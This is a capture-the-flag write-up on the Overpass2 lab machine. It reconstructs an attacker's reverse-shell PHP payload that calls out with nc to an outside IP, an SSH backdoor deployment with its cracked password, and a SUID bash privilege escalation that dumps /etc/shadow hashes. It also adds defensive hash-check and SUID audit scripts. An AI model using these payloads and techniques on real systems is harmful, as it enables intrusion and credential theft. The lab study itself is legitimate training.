--------- THE WAY BACK: WE HACK THE OVERPASS2 MACHINE BY FOLLOWING THE SAME STEPS THE ATTACKER TOOK IN THE CAPTURE WE ANALYSED ----





WE CHECK THE WEBSITE ON PORT 80; THERE IS A MESSAGE IN THE HTML:



http://10.10.217.114/




<body>
    <div>
        <h1>H4ck3d by CooctusClan</h1>
    </div>
    <div>
        <p>Secure your servers!</p>
    </div>
    <div><img src="cooctus.png"></div>
</body>







-------------------- NMAP     ------------------------ 

(NOTE: THE vulners ENTRIES BELOW ARE MATCHED ON THE VERSION BANNER ALONE. UBUNTU BACKPORTS SECURITY FIXES WITHOUT CHANGING THE REPORTED VERSION, SO TREAT THEM AS LEADS TO VERIFY, NOT CONFIRMED VULNERABILITIES; THE REAL WAY IN HERE IS THE BACKDOOR AND THE CRACKED CREDENTIALS.)





┌──(root㉿kali)-[~]
└─# nmap -sS -sV -Pn -O --script='vuln' 10.10.217.114
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-13 13:40 UTC
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for ip-10-10-217-114.eu-west-1.compute.internal (10.10.217.114)
Host is up (0.0013s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:7.6p1: 
|       PRION:CVE-2019-6111     5.8     https://vulners.com/prion/PRION:CVE-2019-6111
|       EXPLOITPACK:98FE96309F9524B8C84C508837551A19    5.8     https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 *EXPLOIT*
|       EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    5.8     https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 *EXPLOIT*
|       EDB-ID:46516    5.8     https://vulners.com/exploitdb/EDB-ID:46516      *EXPLOIT*
|       EDB-ID:46193    5.8     https://vulners.com/exploitdb/EDB-ID:46193      *EXPLOIT*
|       CVE-2019-6111   5.8     https://vulners.com/cve/CVE-2019-6111
|       1337DAY-ID-32328        5.8     https://vulners.com/zdt/1337DAY-ID-32328        *EXPLOIT*
|       1337DAY-ID-32009        5.8     https://vulners.com/zdt/1337DAY-ID-32009        *EXPLOIT*
|       SSH_ENUM        5.0     https://vulners.com/canvas/SSH_ENUM     *EXPLOIT*
|       PRION:CVE-2018-15919    5.0     https://vulners.com/prion/PRION:CVE-2018-15919
|       PRION:CVE-2018-15473    5.0     https://vulners.com/prion/PRION:CVE-2018-15473
|       PACKETSTORM:150621      5.0     https://vulners.com/packetstorm/PACKETSTORM:150621      *EXPLOIT*
|       MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-        5.0     https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-      *EXPLOIT*
|       EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    5.0     https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 *EXPLOIT*
|       EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    5.0     https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 *EXPLOIT*
|       EDB-ID:45939    5.0     https://vulners.com/exploitdb/EDB-ID:45939      *EXPLOIT*
|       CVE-2018-15919  5.0     https://vulners.com/cve/CVE-2018-15919
|       CVE-2018-15473  5.0     https://vulners.com/cve/CVE-2018-15473
|       1337DAY-ID-31730        5.0     https://vulners.com/zdt/1337DAY-ID-31730        *EXPLOIT*
|       PRION:CVE-2019-16905    4.4     https://vulners.com/prion/PRION:CVE-2019-16905
|       CVE-2020-14145  4.3     https://vulners.com/cve/CVE-2020-14145
|       PRION:CVE-2019-6110     4.0     https://vulners.com/prion/PRION:CVE-2019-6110
|       PRION:CVE-2019-6109     4.0     https://vulners.com/prion/PRION:CVE-2019-6109
|       CVE-2019-6110   4.0     https://vulners.com/cve/CVE-2019-6110
|       CVE-2019-6109   4.0     https://vulners.com/cve/CVE-2019-6109
|       PRION:CVE-2018-20685    2.6     https://vulners.com/prion/PRION:CVE-2018-20685
|       CVE-2018-20685  2.6     https://vulners.com/cve/CVE-2018-20685
|       PACKETSTORM:151227      0.0     https://vulners.com/packetstorm/PACKETSTORM:151227      *EXPLOIT*
|_      1337DAY-ID-30937        0.0     https://vulners.com/zdt/1337DAY-ID-30937        *EXPLOIT*
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.29: 
|       CVE-2019-9517   7.8     https://vulners.com/cve/CVE-2019-9517
|       PACKETSTORM:176334      7.5     https://vulners.com/packetstorm/PACKETSTORM:176334      *EXPLOIT*
|       PACKETSTORM:171631      7.5     https://vulners.com/packetstorm/PACKETSTORM:171631      *EXPLOIT*
|       OSV:BIT-APACHE-2023-25690       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2023-25690
|       OSV:BIT-APACHE-2022-31813       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-31813
|       OSV:BIT-APACHE-2022-23943       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-23943
|       OSV:BIT-APACHE-2022-22720       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-22720
|       OSV:BIT-APACHE-2021-44790       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-44790
|       OSV:BIT-APACHE-2021-42013       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-42013
|       OSV:BIT-APACHE-2021-41773       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-41773
|       OSV:BIT-APACHE-2021-39275       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-39275
|       OSV:BIT-APACHE-2021-26691       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-26691
|       OSV:BIT-APACHE-2020-11984       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2020-11984
|       MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-       7.5     https://vulners.com/metasploit/MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-     *EXPLOIT*
|       MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-       7.5     https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-     *EXPLOIT*
|       F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5    7.5     https://vulners.com/githubexploit/F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5  *EXPLOIT*
|       EDB-ID:50512    7.5     https://vulners.com/exploitdb/EDB-ID:50512      *EXPLOIT*
|       EDB-ID:50446    7.5     https://vulners.com/exploitdb/EDB-ID:50446      *EXPLOIT*
|       EDB-ID:50406    7.5     https://vulners.com/exploitdb/EDB-ID:50406      *EXPLOIT*
|       E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6    7.5     https://vulners.com/githubexploit/E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6  *EXPLOIT*
|       CVE-2023-25690  7.5     https://vulners.com/cve/CVE-2023-25690
|       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
|       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
|       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
|       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
|       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
|       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
|       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
|       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
|       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
|       CC15AE65-B697-525A-AF4B-38B1501CAB49    7.5     https://vulners.com/githubexploit/CC15AE65-B697-525A-AF4B-38B1501CAB49  *EXPLOIT*
|       9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5    7.5     https://vulners.com/githubexploit/9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5  *EXPLOIT*
|       8713FD59-264B-5FD7-8429-3251AB5AB3B8    7.5     https://vulners.com/githubexploit/8713FD59-264B-5FD7-8429-3251AB5AB3B8  *EXPLOIT*
|       6A0A657E-8300-5312-99CE-E11F460B1DBF    7.5     https://vulners.com/githubexploit/6A0A657E-8300-5312-99CE-E11F460B1DBF  *EXPLOIT*
|       61075B23-F713-537A-9B84-7EB9B96CF228    7.5     https://vulners.com/githubexploit/61075B23-F713-537A-9B84-7EB9B96CF228  *EXPLOIT*
| http-enum: 
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /downloads/: Potentially interesting folder
|_  /img/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_http-csrf: Couldn't find any CSRF vulnerabilities.
2222/tcp open  ssh     OpenSSH 8.2p1 Debian 4 (protocol 2.0)
MAC Address: 02:16:E2:7D:0B:07 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.62 seconds

---------------- GOBUSTER     ------------------



WE CHECKED WHETHER THE PATH THE ATTACKER SUPPOSEDLY USED EARLIER TO UPLOAD THE PAYLOAD WAS STILL THERE, AND /developmen/uploads/ IS GONE; WE ONLY FOUND THIS:



┌──(root㉿kali)-[~]
└─# gobuster dir -u 10.10.217.114 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.217.114
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2024/02/13 13:51:21 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/aboutus              (Status: 301) [Size: 316] [--> http://10.10.217.114/aboutus/]
/css                  (Status: 301) [Size: 312] [--> http://10.10.217.114/css/]
/downloads            (Status: 301) [Size: 318] [--> http://10.10.217.114/downloads/]
/img                  (Status: 301) [Size: 312] [--> http://10.10.217.114/img/]
/index.html           (Status: 200) [Size: 815]
/server-status        (Status: 403) [Size: 278]
===============================================================
2024/02/13 13:51:22 Finished
===============================================================

*******************************************************************************************************************************
----------  CLEAN RECONSTRUCTION OF ALL THE COMMANDS AND STEPS THE ATTACKER RAN ON AND AGAINST OUR VICTIM SERVER ----------

GET /developmen/uploads/payload.php   (PAYLOAD= <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>)


id 


python3 -c 'import pty;pty.spawn("/bin/bash")'


ls -lAh


cat .overpass


su james  (Password: whenevernoteartinstant)


cd ~


sudo -l 


sudo cat /etc/shadow



git clone https://github.com/NinjaJc01/ssh-backdoor


cd ssh-backdoor


ssh-keygen     (file name: id_rsa)


chmod +x backdoor


./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed



(THE PASSWORD BEHIND THE HASH PASSED TO THE BACKDOOR, COMBINED WITH THE SALT HARDCODED IN THE SCRIPT, WAS november16, WHICH THE ATTACKER MOST LIKELY USED AFTERWARDS TO CONNECT TO THIS BACKDOOR OVER SSH)
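To confirm what hashcat reported, here is an added shell example (not from the writeup or the ssh-backdoor project) that recomputes hex(sha512(password || salt)), the password-then-salt ordering hashcat calls mode 1710, and compares it with a hash:salt record like the one kept in publickey.txt; the wrong-password candidate is constructed for the demo.

```bash
#!/bin/sh
# Added example (not from the writeup or the ssh-backdoor project): checks a
# candidate password against a "hash:salt" record using the scheme the writeup
# cracked with hashcat -m 1710, i.e. hex(sha512(password || salt)).
# Mode 1720 would be the salt-first ordering; picking the wrong one yields
# no match even with the right wordlist, so this check is worth a second look.

# Record as quoted on this page: the backdoor hash and the script's salt.
BACKDOOR_RECORD='6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05'

# sha512_pass_salt PASSWORD SALT -> lowercase hex of sha512(PASSWORD || SALT)
sha512_pass_salt() {
    printf '%s%s' "$1" "$2" | sha512sum | awk '{print $1}'
}

# check_record RECORD PASSWORD -> prints MATCH or NO_MATCH.
# RECORD is "hash:salt"; a duplicated trailing salt ("hash:salt:salt", as in
# the hashlistoparajondos.txt file on this page) is tolerated.
check_record() {
    stored_hash=${1%%:*}
    rest=${1#*:}
    salt=${rest%%:*}
    if [ "$(sha512_pass_salt "$2" "$salt")" = "$stored_hash" ]; then
        echo MATCH
    else
        echo NO_MATCH
    fi
}

# Demo: the password hashcat recovered versus a constructed wrong guess.
for candidate in november16 wrongpassword; do
    printf '%-14s %s\n' "$candidate" "$(check_record "$BACKDOOR_RECORD" "$candidate")"
done
```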


---------------------------------------------------------------------------------------------------------
*********************************************************************************************************

We tried connecting with the hash and salt and the password november16, and bingo, we got in: 10.10.112.242 599bd7873bd4032d


┌──(root㉿kali)-[~]
└─# cat publickey.txt 
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05
┌──(root㉿kali)-[~]
└─# ssh -oHostKeyAlgorithms=+ssh-rsa -p 2222 -i publickey.txt james@10.10.217.114
The authenticity of host '[10.10.217.114]:2222 ([10.10.217.114]:2222)' can't be established.
RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.217.114]:2222' (RSA) to the list of known hosts.
james@10.10.217.114's password: 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

james@overpass-production:/home/james/ssh-backdoor$ whoami
james
james@overpass-production:/home/james/ssh-backdoor$ sudo -l
[sudo] password for james: 
Sorry, try again.
[sudo] password for james: 
Sorry, try again.
[sudo] password for james: 
sudo: 2 incorrect password attempts
james@overpass-production:/home/james/ssh-backdoor$ sudo cat /etc/shadow
[sudo] password for james: 
Sorry, try again.
[sudo] password for james: 
sudo: 1 incorrect password attempt




ANALYSING THE FILES WITH THE SUID BIT SET WE FOUND ONE, .SUID_BASH, BUT RUNNING IT AS-IS WITHOUT PARAMETERS ONLY GIVES US A SHELL AS JAMES; FOR NOW WE ONLY GOT THE JAMES USER FLAG:

james@overpass-production:/home/james/ssh-backdoor$ ls
README.md  backdoor.service  cooctus.png  id_rsa.pub  main.go
backdoor   build.sh          id_rsa       index.html  setup.sh
james@overpass-production:/home/james/ssh-backdoor$ cd ..
james@overpass-production:/home/james$ ls
ssh-backdoor  user.txt  www
james@overpass-production:/home/james$ cat user.txt 
thm{d119b4fa8c497ddb0525f7ad200e6567}



WE SEARCH FOR FILES WITH THE SUID BIT SET:


james@overpass-production:/home$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/bin/mount
/bin/fusermount
/bin/su
/bin/ping
/bin/umount
/home/james/.suid_bash
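As an added defender-side example (not from the writeup), the same find can be turned into an audit that flags setuid files outside the distro-managed directories and setuid files that are byte-for-byte copies of an installed shell, which is exactly what /home/james/.suid_bash is; the scan root and the sample files described in the comments are constructed.

```bash
#!/bin/sh
# Added example (not from the writeup): audit setuid files the way a defender
# would after `find / -perm -u=s -type f`, flagging
#   (a) setuid files outside the directories where distro packages put them, and
#   (b) setuid files whose content is identical to an installed shell, i.e. a
#       renamed copy like /home/james/.suid_bash.
# Why (b) matters: bash resets its effective uid to the real uid at startup
# unless started with -p (privileged mode), so a setuid copy of bash looks
# harmless when run without options and only shows its real power with -p.

# Directories where distro-managed setuid binaries normally live.
SYSTEM_DIRS='/usr/bin /usr/sbin /usr/lib /usr/libexec /bin /sbin /lib /lib64'

# shell_digests -> sha256 of every installed shell we know about, one per line.
shell_digests() {
    for sh_path in /bin/sh /bin/bash /bin/dash /bin/zsh /usr/bin/bash /usr/bin/dash; do
        if [ -f "$sh_path" ]; then sha256sum "$sh_path" | awk '{print $1}'; fi
    done | sort -u
}

# in_system_dir PATH -> exit 0 if PATH lies under one of SYSTEM_DIRS
in_system_dir() {
    for d in $SYSTEM_DIRS; do
        case "$1" in "$d"/*) return 0 ;; esac
    done
    return 1
}

# audit_suid ROOT -> prints "<path> <reason[,reason]>" for every setuid file
# under ROOT that is suspicious; expected system binaries print nothing.
audit_suid() {
    root=$1
    known=$(shell_digests)
    find "$root" -xdev -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
        reasons=
        in_system_dir "$f" || reasons="unexpected-location"
        digest=$(sha256sum "$f" | awk '{print $1}')
        if printf '%s\n' "$known" | grep -qx "$digest"; then
            reasons="${reasons:+$reasons,}shell-copy"
        fi
        if [ -n "$reasons" ]; then printf '%s %s\n' "$f" "$reasons"; fi
    done
}

# Usage: sh audit_suid.sh /      (no argument: define the functions only)
if [ $# -gt 0 ]; then audit_suid "$1"; fi
```

On the compromised host in this writeup the audit would report `/home/james/.suid_bash unexpected-location,shell-copy` and stay silent on the packaged binaries such as /usr/bin/sudo and /bin/su.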




WE FOUND THAT THE .SUID_BASH FILE HAD READABLE OPTIONS INSIDE IT, INCLUDING A -p PARAMETER TO PASS ON THE COMMAND LINE SO THAT IT KEEPS ACCESS TO ALL THE $PATH DIRECTORIES, AND BINGO, IT WORKED: WE BECAME ROOT    :D  :

james@overpass-production:/home/james$ ./.suid_bash -p       
.suid_bash-4.4# whoami
root


.suid_bash-4.4# cd /root
.suid_bash-4.4# ls
root.txt
.suid_bash-4.4# cat root.txt 
thm{d53b2684f169360bb9606c333873144d}

LATER, LOOKING MORE CLOSELY AT THE SUID SCRIPT, WE SAW THE PARAMETERS FOR DRIVING IT FROM THE COMMAND LINE AND EVEN MANAGED TO RUN SINGLE COMMANDS AS ROOT WITH IT WITHOUT GETTING THE SHELL DIRECTLY; WE TRIED IT TO UNDERSTAND THE SCRIPT BETTER:

james@overpass-production:/home/james$ ./.suid_bash -c whoami
james
james@overpass-production:/home/james$ ./.suid_bash -p -c whoami
root
james@overpass-production:/home/james$ ./.suid_bash -p -c cat /etc/shadow
^C
james@overpass-production:/home/james$ ./.suid_bash -p -c "cat /etc/shadow"
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$o23rmAtq$FabncpS1b85LDz9DfBShXj.hJXYIcGf1KdKJZP/3x3bGUJpP6Kvfc0JT8IkDaLbImCPGRPMUgXtA2NHLu8DEp1:18464:0:99999:7:::
paradox:$6$FVl2Uugb$TGpvNxRQWDYpK/lj505LDgdcrMCMN2e4c5MJ.YhVoZY7bRNwAZ2S24XapBm/s5s59tfrc4528tvrlJoNpJI2i0:18464:0:99999:7:::
szymex:$6$VwSYCytA$f.OYSpSkouPHPxd..Y3.Kdtm0P/Dc1lmHn722NO6.tj39r87KtOx7L0lIlJxYoDChkN4q/93cXg3MIMDZSPD00:18464:0:99999:7:::
bee:$6$ebKaOMGO$Pe7KvyDzaLctd1.SRSdiud.VSmokU5/Fla4VnDpNVMtk6TKmHcxb3kyGcUcFv89YTq9LuwoYtmnXLKz/X2Yu9.:18464:0:99999:7:::
muirland:$6$nESmZyzG$IcXb5muWfGIMK3ZsZa7Ml/DvQGTTzK8P.XKnCeRlPjP13shRrSjGnSQFCXhWOR.6It.VTLNOQnQt9pU.klTBu.:18464:0:99999:7:::
james@overpass-production:/home/james$ ./.suid_bash -p -O                  
autocd          off
cdable_vars     off
cdspell         off
checkhash       off
checkjobs       off
checkwinsize    off
cmdhist         on
compat31        off
compat32        off
compat40        off
compat41        off
compat42        off
compat43        off
complete_fullquote on
direxpand       off
dirspell        off
dotglob         off
execfail        off
expand_aliases  off
extdebug        off
extglob         off
extquote        on
failglob        off
force_fignore   on
globasciiranges off
globstar        off
gnu_errfmt      off
histappend      off
histreedit      off
histverify      off
hostcomplete    on
huponexit       off
inherit_errexit off
interactive_comments on
lastpipe        off
lithist         off
login_shell     off
mailwarn        off
no_empty_cmd_completion off
nocaseglob      off
nocasematch     off
nullglob        off
progcomp        on
promptvars      on
restricted_shell off
shift_verbose   off
sourcepath      on
xpg_echo        off
.suid_bash-4.4# exit
exit
